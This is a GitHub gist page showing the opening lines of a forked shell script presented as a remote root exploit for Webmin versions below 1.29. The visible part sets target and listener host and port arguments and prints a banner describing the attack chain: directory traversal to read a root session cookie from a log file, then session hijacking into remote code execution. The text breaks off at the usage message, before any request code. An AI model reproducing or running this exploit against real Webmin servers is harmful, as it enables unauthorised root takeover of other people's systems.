Skip to content

Instantly share code, notes, and snippets.

View YaaSSDD's full-sized avatar
🎯
Focusing

Yassine MHAIA YaaSSDD

🎯
Focusing
View GitHub Profile
@YaaSSDD
YaaSSDD / wmsploit-remote-root-1.29-reprise.sh
Created February 22, 2020 22:45 — forked from oxagast/wmsploit-remote-root-1.29-reprise.sh
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"